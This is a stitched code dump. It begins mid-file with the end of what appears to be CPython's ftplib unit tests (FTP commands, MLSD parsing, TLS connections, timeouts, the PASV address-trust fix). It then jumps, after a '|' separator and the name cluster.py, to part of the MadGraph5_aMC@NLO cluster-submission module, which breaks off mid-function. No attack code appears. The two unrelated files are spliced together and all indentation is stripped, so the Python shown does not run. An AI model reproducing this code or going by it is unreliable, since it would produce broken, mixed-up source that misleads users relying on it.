ftplib.error_proto, ftplib.Error, OSError,
EOFError)
for x in exceptions:
try:
raise x('exception not included in all_errors set')
except ftplib.all_errors:
pass
def test_set_pasv(self):
# passive mode is supposed to be enabled by default
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(True)
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(False)
self.assertFalse(self.client.passiveserver)
def test_voidcmd(self):
self.client.voidcmd('echo 200')
self.client.voidcmd('echo 299')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 199')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 300')
def test_login(self):
self.client.login()
def test_acct(self):
self.client.acct('passwd')
def test_rename(self):
self.client.rename('a', 'b')
self.server.handler_instance.next_response = '200'
self.assertRaises(ftplib.error_reply, self.client.rename, 'a', 'b')
def test_delete(self):
self.client.delete('foo')
self.server.handler_instance.next_response = '199'
self.assertRaises(ftplib.error_reply, self.client.delete, 'foo')
def test_size(self):
self.client.size('foo')
def test_mkd(self):
dir = self.client.mkd('/foo')
self.assertEqual(dir, '/foo')
def test_rmd(self):
self.client.rmd('foo')
def test_cwd(self):
dir = self.client.cwd('/foo')
self.assertEqual(dir, '250 cwd ok')
def test_pwd(self):
dir = self.client.pwd()
self.assertEqual(dir, 'pwd ok')
def test_quit(self):
self.assertEqual(self.client.quit(), '221 quit ok')
# Ensure the connection gets closed; sock attribute should be None
self.assertEqual(self.client.sock, None)
def test_abort(self):
self.client.abort()
def test_retrbinary(self):
def callback(data):
received.append(data.decode('ascii'))
received = []
self.client.retrbinary('retr', callback)
self.check_data(''.join(received), RETR_DATA)
def test_retrbinary_rest(self):
def callback(data):
received.append(data.decode('ascii'))
for rest in (0, 10, 20):
received = []
self.client.retrbinary('retr', callback, rest=rest)
self.check_data(''.join(received), RETR_DATA[rest:])
def test_retrlines(self):
received = []
self.client.retrlines('retr', received.append)
self.check_data(''.join(received), RETR_DATA.replace('\r\n', ''))
def test_storbinary(self):
f = io.BytesIO(RETR_DATA.encode('ascii'))
self.client.storbinary('stor', f)
self.check_data(self.server.handler_instance.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storbinary('stor', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_storbinary_rest(self):
f = io.BytesIO(RETR_DATA.replace('\r\n', '\n').encode('ascii'))
for r in (30, '30'):
f.seek(0)
self.client.storbinary('stor', f, rest=r)
self.assertEqual(self.server.handler_instance.rest, str(r))
def test_storlines(self):
f = io.BytesIO(RETR_DATA.replace('\r\n', '\n').encode('ascii'))
self.client.storlines('stor', f)
self.check_data(self.server.handler_instance.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storlines('stor foo', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
f = io.StringIO(RETR_DATA.replace('\r\n', '\n'))
# storlines() expects a binary file, not a text file
with support.check_warnings(('', BytesWarning), quiet=True):
self.assertRaises(TypeError, self.client.storlines, 'stor foo', f)
def test_nlst(self):
self.client.nlst()
self.assertEqual(self.client.nlst(), NLST_DATA.split('\r\n')[:-1])
def test_dir(self):
l = []
self.client.dir(lambda x: l.append(x))
self.assertEqual(''.join(l), LIST_DATA.replace('\r\n', ''))
def test_mlsd(self):
list(self.client.mlsd())
list(self.client.mlsd(path='/'))
list(self.client.mlsd(path='/', facts=['size', 'type']))
ls = list(self.client.mlsd())
for name, facts in ls:
self.assertIsInstance(name, str)
self.assertIsInstance(facts, dict)
self.assertTrue(name)
self.assertIn('type', facts)
self.assertIn('perm', facts)
self.assertIn('unique', facts)
def set_data(data):
self.server.handler_instance.next_data = data
def test_entry(line, type=None, perm=None, unique=None, name=None):
type = 'type' if type is None else type
perm = 'perm' if perm is None else perm
unique = 'unique' if unique is None else unique
name = 'name' if name is None else name
set_data(line)
_name, facts = next(self.client.mlsd())
self.assertEqual(_name, name)
self.assertEqual(facts['type'], type)
self.assertEqual(facts['perm'], perm)
self.assertEqual(facts['unique'], unique)
# plain
test_entry('type=type;perm=perm;unique=unique; name\r\n')
# "=" in fact value
test_entry('type=ty=pe;perm=perm;unique=unique; name\r\n', type="ty=pe")
test_entry('type==type;perm=perm;unique=unique; name\r\n', type="=type")
test_entry('type=t=y=pe;perm=perm;unique=unique; name\r\n', type="t=y=pe")
test_entry('type=====;perm=perm;unique=unique; name\r\n', type="====")
# spaces in name
test_entry('type=type;perm=perm;unique=unique; na me\r\n', name="na me")
test_entry('type=type;perm=perm;unique=unique; name \r\n', name="name ")
test_entry('type=type;perm=perm;unique=unique; name\r\n', name=" name")
test_entry('type=type;perm=perm;unique=unique; n am e\r\n', name="n am e")
# ";" in name
test_entry('type=type;perm=perm;unique=unique; na;me\r\n', name="na;me")
test_entry('type=type;perm=perm;unique=unique; ;name\r\n', name=";name")
test_entry('type=type;perm=perm;unique=unique; ;name;\r\n', name=";name;")
test_entry('type=type;perm=perm;unique=unique; ;;;;\r\n', name=";;;;")
# case sensitiveness
set_data('Type=type;TyPe=perm;UNIQUE=unique; name\r\n')
_name, facts = next(self.client.mlsd())
for x in facts:
self.assertTrue(x.islower())
# no data (directory empty)
set_data('')
self.assertRaises(StopIteration, next, self.client.mlsd())
set_data('')
for x in self.client.mlsd():
self.fail("unexpected data %s" % x)
def test_makeport(self):
with self.client.makeport():
# IPv4 is in use, just make sure send_eprt has not been used
self.assertEqual(self.server.handler_instance.last_received_cmd,
'port')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), timeout=TIMEOUT)
conn.close()
# IPv4 is in use, just make sure send_epsv has not been used
self.assertEqual(self.server.handler_instance.last_received_cmd, 'pasv')
def test_makepasv_issue43285_security_disabled(self):
"""Test the opt-in to the old vulnerable behavior."""
self.client.trust_server_pasv_ipv4_address = True
bad_host, port = self.client.makepasv()
self.assertEqual(
bad_host, self.server.handler_instance.fake_pasv_server_ip)
# Opening and closing a connection keeps the dummy server happy
# instead of timing out on accept.
socket.create_connection((self.client.sock.getpeername()[0], port),
timeout=TIMEOUT).close()
def test_makepasv_issue43285_security_enabled_default(self):
self.assertFalse(self.client.trust_server_pasv_ipv4_address)
trusted_host, port = self.client.makepasv()
self.assertNotEqual(
trusted_host, self.server.handler_instance.fake_pasv_server_ip)
# Opening and closing a connection keeps the dummy server happy
# instead of timing out on accept.
socket.create_connection((trusted_host, port), timeout=TIMEOUT).close()
def test_with_statement(self):
self.client.quit()
def is_client_connected():
if self.client.sock is None:
return False
try:
self.client.sendcmd('noop')
except (OSError, EOFError):
return False
return True
# base test
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.assertTrue(is_client_connected())
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
# QUIT sent inside the with block
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.client.quit()
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
# force a wrong response code to be sent on QUIT: error_perm
# is expected and the connection is supposed to be closed
try:
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.server.handler_instance.next_response = '550 error on quit'
except ftplib.error_perm as err:
self.assertEqual(str(err), '550 error on quit')
else:
self.fail('Exception not raised')
# needed to give the threaded server some time to set the attribute
# which otherwise would still be == 'noop'
time.sleep(0.1)
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
def test_source_address(self):
self.client.quit()
port = support.find_unused_port()
try:
self.client.connect(self.server.host, self.server.port,
source_address=(HOST, port))
self.assertEqual(self.client.sock.getsockname()[1], port)
self.client.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def test_source_address_passive_connection(self):
port = support.find_unused_port()
self.client.source_address = (HOST, port)
try:
with self.client.transfercmd('list') as sock:
self.assertEqual(sock.getsockname()[1], port)
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def test_parse257(self):
self.assertEqual(ftplib.parse257('257 "/foo/bar"'), '/foo/bar')
self.assertEqual(ftplib.parse257('257 "/foo/bar" created'), '/foo/bar')
self.assertEqual(ftplib.parse257('257 ""'), '')
self.assertEqual(ftplib.parse257('257 "" created'), '')
self.assertRaises(ftplib.error_reply, ftplib.parse257, '250 "/foo/bar"')
# The 257 response is supposed to include the directory
# name and in case it contains embedded double-quotes
# they must be doubled (see RFC-959, chapter 7, appendix 2).
self.assertEqual(ftplib.parse257('257 "/foo/b""ar"'), '/foo/b"ar')
self.assertEqual(ftplib.parse257('257 "/foo/b""ar" created'), '/foo/b"ar')
def test_line_too_long(self):
self.assertRaises(ftplib.Error, self.client.sendcmd,
'x' * self.client.maxline * 2)
def test_retrlines_too_long(self):
self.client.sendcmd('SETLONGRETR %d' % (self.client.maxline * 2))
received = []
self.assertRaises(ftplib.Error,
self.client.retrlines, 'retr', received.append)
def test_storlines_too_long(self):
f = io.BytesIO(b'x' * self.client.maxline * 2)
self.assertRaises(ftplib.Error, self.client.storlines, 'stor', f)
@skipUnless(support.IPV6_ENABLED, "IPv6 not enabled")
class TestIPv6Environment(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOSTv6, 0), af=socket.AF_INET6)
self.server.start()
self.client = ftplib.FTP(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
# Explicitly clear the attribute to prevent dangling thread
self.server = None
asyncore.close_all(ignore_all=True)
def test_af(self):
self.assertEqual(self.client.af, socket.AF_INET6)
def test_makeport(self):
with self.client.makeport():
self.assertEqual(self.server.handler_instance.last_received_cmd,
'eprt')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), timeout=TIMEOUT)
conn.close()
self.assertEqual(self.server.handler_instance.last_received_cmd, 'epsv')
def test_transfer(self):
def retr():
def callback(data):
received.append(data.decode('ascii'))
received = []
self.client.retrbinary('retr', callback)
self.assertEqual(len(''.join(received)), len(RETR_DATA))
self.assertEqual(''.join(received), RETR_DATA)
self.client.set_pasv(True)
retr()
self.client.set_pasv(False)
retr()
@skipUnless(ssl, "SSL not available")
class TestTLS_FTPClassMixin(TestFTPClass):
"""Repeat TestFTPClass tests starting the TLS layer for both control
and data connections first.
"""
def setUp(self):
self.server = DummyTLS_FTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP_TLS(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
# enable TLS
self.client.auth()
self.client.prot_p()
@skipUnless(ssl, "SSL not available")
class TestTLS_FTPClass(TestCase):
"""Specific TLS_FTP class tests."""
def setUp(self):
self.server = DummyTLS_FTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP_TLS(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
# Explicitly clear the attribute to prevent dangling thread
self.server = None
asyncore.close_all(ignore_all=True)
def test_control_connection(self):
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
def test_data_connection(self):
# clear text
with self.client.transfercmd('list') as sock:
self.assertNotIsInstance(sock, ssl.SSLSocket)
self.assertEqual(sock.recv(1024), LIST_DATA.encode('ascii'))
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# secured, after PROT P
self.client.prot_p()
with self.client.transfercmd('list') as sock:
self.assertIsInstance(sock, ssl.SSLSocket)
# consume from SSL socket to finalize handshake and avoid
# "SSLError [SSL] shutdown while in init"
self.assertEqual(sock.recv(1024), LIST_DATA.encode('ascii'))
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# PROT C is issued, the connection must be in cleartext again
self.client.prot_c()
with self.client.transfercmd('list') as sock:
self.assertNotIsInstance(sock, ssl.SSLSocket)
self.assertEqual(sock.recv(1024), LIST_DATA.encode('ascii'))
self.assertEqual(self.client.voidresp(), "226 transfer complete")
def test_login(self):
# login() is supposed to implicitly secure the control connection
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.login()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
# make sure that AUTH TLS doesn't get issued again
self.client.login()
def test_auth_issued_twice(self):
self.client.auth()
self.assertRaises(ValueError, self.client.auth)
def test_context(self):
self.client.quit()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
self.assertRaises(ValueError, ftplib.FTP_TLS, keyfile=CERTFILE,
context=ctx)
self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
context=ctx)
self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
keyfile=CERTFILE, context=ctx)
self.client = ftplib.FTP_TLS(context=ctx, timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIs(self.client.sock.context, ctx)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.client.prot_p()
with self.client.transfercmd('list') as sock:
self.assertIs(sock.context, ctx)
self.assertIsInstance(sock, ssl.SSLSocket)
def test_ccc(self):
self.assertRaises(ValueError, self.client.ccc)
self.client.login(secure=True)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.client.ccc()
self.assertRaises(ValueError, self.client.sock.unwrap)
@skipUnless(False, "FIXME: bpo-32706")
def test_check_hostname(self):
self.client.quit()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.check_hostname, True)
ctx.load_verify_locations(CAFILE)
self.client = ftplib.FTP_TLS(context=ctx, timeout=TIMEOUT)
# 127.0.0.1 doesn't match SAN
self.client.connect(self.server.host, self.server.port)
with self.assertRaises(ssl.CertificateError):
self.client.auth()
# exception quits connection
self.client.connect(self.server.host, self.server.port)
self.client.prot_p()
with self.assertRaises(ssl.CertificateError):
with self.client.transfercmd("list") as sock:
pass
self.client.quit()
self.client.connect("localhost", self.server.port)
self.client.auth()
self.client.quit()
self.client.connect("localhost", self.server.port)
self.client.prot_p()
with self.client.transfercmd("list") as sock:
pass
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(20)
self.port = support.bind_port(self.sock)
self.server_thread = threading.Thread(target=self.server)
self.server_thread.daemon = True
self.server_thread.start()
# Wait for the server to be ready.
self.evt.wait()
self.evt.clear()
self.old_port = ftplib.FTP.port
ftplib.FTP.port = self.port
def tearDown(self):
ftplib.FTP.port = self.old_port
self.server_thread.join()
# Explicitly clear the attribute to prevent dangling thread
self.server_thread = None
def server(self):
# This method sets the evt 3 times:
# 1) when the connection is ready to be accepted.
# 2) when it is safe for the caller to close the connection
# 3) when we have closed the socket
self.sock.listen()
# (1) Signal the caller that we are ready to accept the connection.
self.evt.set()
try:
conn, addr = self.sock.accept()
except socket.timeout:
pass
else:
conn.sendall(b"1 Hola mundo\n")
conn.shutdown(socket.SHUT_WR)
# (2) Signal the caller that it is safe to close the socket.
self.evt.set()
conn.close()
finally:
self.sock.close()
def testTimeoutDefault(self):
# default -- use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP(HOST)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutNone(self):
# no timeout -- do not use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP(HOST, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(ftp.sock.gettimeout())
self.evt.wait()
ftp.close()
def testTimeoutValue(self):
# a value
ftp = ftplib.FTP(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutConnect(self):
ftp = ftplib.FTP()
ftp.connect(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDifferentOrder(self):
ftp = ftplib.FTP(timeout=30)
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDirectAccess(self):
ftp = ftplib.FTP()
ftp.timeout = 30
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
class MiscTestCase(TestCase):
def test__all__(self):
blacklist = {'MSG_OOB', 'FTP_PORT', 'MAXLINE', 'CRLF', 'B_CRLF',
'Error', 'parse150', 'parse227', 'parse229', 'parse257',
'print_line', 'ftpcp', 'test'}
support.check__all__(self, ftplib, blacklist=blacklist)
def test_main():
tests = [TestFTPClass, TestTimeouts,
TestIPv6Environment,
TestTLS_FTPClassMixin, TestTLS_FTPClass,
MiscTestCase]
thread_info = support.threading_setup()
try:
support.run_unittest(*tests)
finally:
support.threading_cleanup(*thread_info)
if __name__ == '__main__':
test_main()
|
cluster.py
|
################################################################################
# Copyright (c) 2009 The MadGraph5_aMC@NLO Development team and Contributors
#
# This file is a part of the MadGraph5_aMC@NLO project, an application which
# automatically generates Feynman diagrams and matrix elements for arbitrary
# high-energy processes in the Standard Model and beyond.
#
# It is subject to the MadGraph5_aMC@NLO license which should accompany this
# distribution.
#
# For more information, visit madgraph.phys.ucl.ac.be and amcatnlo.web.cern.ch
#
################################################################################
import subprocess
import logging
import os
import time
import re
import glob
import inspect
import sys
logger = logging.getLogger('madgraph.cluster')
try:
from madgraph import MadGraph5Error
import madgraph.various.misc as misc
except Exception, error:
if __debug__:
print str(error)
from internal import MadGraph5Error
import internal.misc as misc
pjoin = os.path.join
class ClusterManagmentError(MadGraph5Error):
pass
class NotImplemented(MadGraph5Error):
pass
multiple_try = misc.multiple_try
pjoin = os.path.join
def check_interupt(error=KeyboardInterrupt):
def deco_interupt(f):
def deco_f_interupt(self, *args, **opt):
try:
return f(self, *args, **opt)
except error:
try:
self.remove(*args, **opt)
except Exception:
pass
raise error
return deco_f_interupt
return deco_interupt
def store_input(arg=''):
def deco_store(f):
def deco_f_store(self, prog, argument=[], cwd=None, stdout=None, stderr=None, log=None,
input_files=[], output_files=[], required_output=[], nb_submit=0):
frame = inspect.currentframe()
args, _, _, values = inspect.getargvalues(frame)
args = dict([(i, values[i]) for i in args if i != 'self'])
id = f(self, **args)
if self.nb_retry > 0:
self.retry_args[id] = args
return id
return deco_f_store
return deco_store
def need_transfer(options):
""" This function checks whether compression of input files are necessary
given the running options given. """
if options['run_mode'] != 1 and options['cluster_temp_path'] is None:
return False
else:
return True
class Cluster(object):
"""Basic Class for all cluster type submission"""
name = 'mother class'
identifier_length = 14
def __init__(self,*args, **opts):
"""Init the cluster"""
self.submitted = 0
self.submitted_ids = []
self.finish = 0
self.submitted_dirs = [] #HTCaaS
self.submitted_exes = [] #HTCaaS
self.submitted_args = [] #HTCaaS
if 'cluster_queue' in opts:
self.cluster_queue = opts['cluster_queue']
else:
self.cluster_queue = 'madgraph'
if 'cluster_temp_path' in opts:
self.temp_dir = opts['cluster_temp_path']
else:
self.temp_dir = None
self.options = {'cluster_status_update': (600, 30)}
for key,value in opts.items():
self.options[key] = value
self.nb_retry = opts['cluster_nb_retry'] if 'cluster_nb_retry' in opts else 0
self.cluster_retry_wait = float(opts['cluster_retry_wait']) if 'cluster_retry_wait' in opts else 300
self.options = dict(opts)
self.retry_args = {}
# controlling jobs in controlled type submision
self.packet = {}
self.id_to_packet = {}
def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
log=None, required_output=[], nb_submit=0):
"""How to make one submission. Return status id on the cluster."""
raise NotImplemented, 'No implementation of how to submit a job to cluster \'%s\'' % self.name
@store_input()
def submit2(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
log=None, input_files=[], output_files=[], required_output=[],
nb_submit=0):
"""How to make one submission. Return status id on the cluster.
NO SHARE DISK"""
if cwd is None:
cwd = os.getcwd()
if not os.path.exists(prog):
prog = os.path.join(cwd, prog)
if not required_output and output_files:
required_output = output_files
if not hasattr(self, 'temp_dir') or not self.temp_dir or \
(input_files == [] == output_files):
return self.submit(prog, argument, cwd, stdout, stderr, log,
required_output=required_output, nb_submit=nb_submit)
if not input_files and not output_files:
# not input/output so not using submit2
return self.submit(prog, argument, cwd, stdout, stderr, log,
required_output=required_output, nb_submit=nb_submit)
if cwd is None:
cwd = os.getcwd()
if not os.path.exists(prog):
prog = os.path.join(cwd, prog)
temp_file_name = "sub." + os.path.basename(prog) + '.'.join(argument)
text = """#!/bin/bash
MYTMP=%(tmpdir)s/run$%(job_id)s
MYPWD=%(cwd)s
mkdir -p $MYTMP
cd $MYPWD
input_files=( %(input_files)s )
for i in ${input_files[@]}
do
cp -R -L $i $MYTMP
done
cd $MYTMP
echo '%(arguments)s' > arguments
chmod +x ./%(script)s
%(program)s ./%(script)s %(arguments)s
exit=$?
output_files=( %(output_files)s )
for i in ${output_files[@]}
do
cp -r $MYTMP/$i $MYPWD
done
# if [ "$exit" -eq "0" ]
# then
rm -rf $MYTMP
# fi
"""
dico = {'tmpdir' : self.temp_dir, 'script': os.path.basename(prog),
'cwd': cwd, 'job_id': self.job_id,
'input_files': ' '.join(input_files + [prog]),
'output_files': ' '.join(output_files),
'arguments': ' '.join([str(a) for a in argument]),
'program': ' ' if '.py' in prog else 'bash'}
# writing a new script for the submission
new_prog = pjoin(cwd, temp_file_name)
open(new_prog, 'w').write(text % dico)
misc.Popen(['chmod','+x',new_prog],cwd=cwd)
return self.submit(new_prog, argument, cwd, stdout, stderr, log,
required_output=required_output, nb_submit=nb_submit)
def cluster_submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
log=None, input_files=[], output_files=[], required_output=[],
nb_submit=0, packet_member=None):
"""This function wrap the cluster submition with cluster independant
method should not be overwritten (but for DAG type submission)"""
id = self.submit2(prog, argument, cwd, stdout, stderr, log, input_files,
output_files, required_output, nb_submit)
if not packet_member:
return id
else:
if isinstance(packet_member, Packet):
self.id_to_packet[id] = packet_member
packet_member.put(id)
if packet_member.tag not in self.packet:
self.packet[packet_member.tag] = packet_member
else:
if packet_member in self.packet:
packet = self.packet[packet_member]
packet.put(id)
self.id_to_packet[id] = packet
return id
def control(self, me_dir=None):
"""Check the status of job associated to directory me_dir. return (idle, run, finish, fail)"""
if not self.submitted_ids:
raise NotImplemented, 'No implementation of how to control the job status to cluster \'%s\'' % self.name
idle, run, fail = 0, 0, 0
for pid in self.submitted_ids[:]:
status = self.control_one_job(id)
if status == 'I':
idle += 1
elif status == 'R':
run += 1
elif status == 'F':
self.finish +=1
self.submitted_ids.remove(pid)
else:
fail += 1
return idle, run, self.finish, fail
def control_one_job(self, pid):
""" control the status of a single job with it's cluster id """
raise NotImplemented, 'No implementation of how to control the job status to cluster \'%s\'' % self.name
def get_jobs_identifier(self, path, second_path=None):
"""get a unique run_name for all the jobs helps to identify the runs
in the controller for some cluster."""
if second_path:
path = os.path.realpath(pjoin(path, second_path))
elif not os.path.exists(path):
return path # job already done
if 'SubProcesses' in path:
target = path.rsplit('/SubProcesses',1)[0]
elif 'MCatNLO' in path:
target = path.rsplit('/MCatNLO',1)[0]
elif second_path:
target=path
logger.warning("cluster.get_job_identifier runs unexpectedly. This should be fine but report this message if you have problem.")
elif 'PY8_parallelization' in path:
target = path.rsplit('/PY8_parallelization',1)[0]
else:
target = path
if target.endswith('/'):
target = target[:-1]
target = misc.digest(target)[-self.identifier_length:]
if not target[0].isalpha():
target = 'a' + target[1:]
return target
@check_interupt()
def wait(self, me_dir, fct, minimal_job=0, update_first=None):
"""Wait that all job are finish.
if minimal_job set, then return if idle + run is lower than that number"""
mode = 1 # 0 is long waiting/ 1 is short waiting
nb_iter = 0
nb_short = 0
change_at = 5 # number of iteration from which we wait longer between update.
if update_first:
idle, run, finish, fail = self.control(me_dir)
update_first(idle, run, finish)
#usefull shortcut for readibility
longtime, shorttime = self.options['cluster_status_update']
nb_job = 0
if self.options['cluster_type'] == 'htcaas2':
me_dir = self.metasubmit(self)
while 1:
old_mode = mode
nb_iter += 1
idle, run, finish, fail = self.control(me_dir)
if nb_job:
if idle + run + finish + fail != nb_job:
nb_job = idle + run + finish + fail
nb_iter = 1 # since some packet finish prevent to pass in long waiting mode
else:
nb_job = idle + run + finish + fail
if fail:
raise ClusterManagmentError('Some Jobs are in a Hold/... state. Please try to investigate or contact the IT team')
if idle + run == 0:
#time.sleep(20) #security to ensure that the file are really written on the disk
logger.info('All jobs finished')
fct(idle, run, finish)
break
if idle + run < minimal_job:
return
fct(idle, run, finish)
#Determine how much we have to wait (mode=0->long time, mode=1->short time)
if nb_iter < change_at:
mode = 1
elif idle < run:
if old_mode == 0:
if nb_short:
mode = 0 #we already be back from short to long so stay in long
#check if we need to go back to short mode
elif idle:
if nb_iter > change_at + int(longtime)//shorttime:
mode = 0 #stay in long waiting mode
else:
mode = 1 # pass in short waiting mode
nb_short =0
else:
mode = 1 # pass in short waiting mode
nb_short = 0
elif old_mode == 1:
nb_short +=1
if nb_short > 3* max(change_at, int(longtime)//shorttime):
mode = 0 #go back in slow waiting
else:
mode = 0
#if pass from fast(mode=1) to slow(mode=0) make a print statement:
if old_mode > mode:
logger.info('''Start to wait %ss between checking status.
Note that you can change this time in the configuration file.
Press ctrl-C to force the update.''' % self.options['cluster_status_update'][0])
#now Waiting!
if mode == 0:
try:
time.sleep(self.options['cluster_status_update'][0])
except KeyboardInterrupt:
logger.info('start to update the status')
nb_iter = min(0, change_at -2)
nb_short = 0
else:
time.sleep(self.options['cluster_status_update'][1])
self.submitted = 0
self.submitted_ids = []
def check_termination(self, job_id):
"""Check the termination of the jobs with job_id and relaunch it if needed."""
if job_id not in self.retry_args:
if job_id in self.id_to_packet:
nb_in_packet = self.id_to_packet[job_id].remove_one()
if nb_in_packet == 0:
# packet done run the associate function
packet = self.id_to_packet[job_id]
# fully ensure that the packet is finished (thread safe)
packet.queue.join()
#running the function
packet.fct(*packet.args)
del self.id_to_packet[job_id]
return 'resubmit'
else:
return True
args = self.retry_args[job_id]
if 'time_check' in args:
time_check = args['time_check']
else:
time_check = 0
for path in args['required_output']:
if args['cwd']:
path = pjoin(args['cwd'], path)
# check that file exists and is not empty.
if not (os.path.exists(path) and os.stat(path).st_size != 0) :
break
else:
# all requested output are present
if time_check > 0:
logger.info('Job %s Finally found the missing output.' % (job_id))
del self.retry_args[job_id]
self.submitted_ids.remove(job_id)
# check if the job_id is in a packet
if job_id in self.id_to_packet:
nb_in_packet = self.id_to_packet[job_id].remove_one()
if nb_in_packet == 0:
# packet done run the associate function
packet = self.id_to_packet[job_id]
# fully ensure that the packet is finished (thread safe)
packet.queue.join()
#running the function
packet.fct(*packet.args)
del self.id_to_packet[job_id]
return 'resubmit'
return 'done'
if time_check == 0:
logger.debug('''Job %s: missing output:%s''' % (job_id,path))
args['time_check'] = time.time()
return 'wait'
elif self.cluster_retry_wait > time.time() - time_check:
return 'wait'
#jobs failed to be completed even after waiting time!!
if self.nb_retry < 0:
logger.critical('''Fail to run correctly job %s.
with option: %s
file missing: %s''' % (job_id, args, path))
raw_input('press enter to continue.')
elif self.nb_retry == 0:
logger.critical('''Fail to run correctly job %s.
with option: %s
file missing: %s.
Stopping all runs.''' % (job_id, args, path))
self.remove()
elif args['nb_submit'] >= self.nb_retry:
logger.critical('''Fail to run correctly job %s.
with option: %s
file missing: %s
Fails %s times
No resubmition. ''' % (job_id, args, path, args['nb_submit']))
self.remove()
else:
args['nb_submit'] += 1
logger.warning('resubmit job (for the %s times)' % args['nb_submit'])
del self.retry_args[job_id]
self.submitted_ids.remove(job_id)
if 'time_check' in args:
del args['time_check']
if job_id in self.id_to_packet:
self.id_to_packet[job_id].remove_one()
args['packet_member'] = self.id_to_packet[job_id]
del self.id_to_packet[job_id]
self.cluster_submit(**args)
else:
self.submit2(**args)
return 'resubmit'
return 'done'
@check_interupt()
def launch_and_wait(self, prog, argument=[], cwd=None, stdout=None,
stderr=None, log=None, required_output=[], nb_submit=0,
input_files=[], output_files=[]):
"""launch one job on the cluster and wait for it"""
special_output = False # tag for concatenate the error with the output.
if stderr == -2 and stdout:
#We are suppose to send the output to stdout
special_output = True
stderr = stdout + '.err'
id = self.submit2(prog, argument, cwd, stdout, stderr, log,
required_output=required_output, input_files=input_files,
output_files=output_files)
if self.options['cluster_type']=='htcaas2':
if self.submitted == self.submitted_ids[-1]:
id = self.metasubmit(self)
frame = inspect.currentframe()
args, _, _, values = inspect.getargvalues(frame)
args = dict([(i, values[i]) for i in args if i != 'self'])
self.retry_args[id] = args
nb_wait=0
while 1:
nb_wait+=1
status = self.control_one_job(id)
if not status in ['R','I']:
status = self.check_termination(id)
if status in ['wait']:
time.sleep(30)
continue
elif status in ['resubmit']:
id = self.submitted_ids[0]
time.sleep(30)
continue
#really stop!
time.sleep(30) #security to ensure that the file are really written on the disk
break
time.sleep(self.options['cluster_status_update'][1])
if required_output:
status = self.check_termination(id)
if status == 'wait':
run += 1
elif status == 'resubmit':
idle += 1
if special_output:
# combine the stdout and the stderr
#wait up to 50 s to see if those files exists
for i in range(5):
if os.path.exists(stdout):
if not os.path.exists(stderr):
time.sleep(5)
if os.path.exists(stderr):
err_text = open(stderr).read()
if not err_text:
return
logger.warning(err_text)
text = open(stdout).read()
open(stdout,'w').write(text + err_text)
else:
return
time.sleep(10)
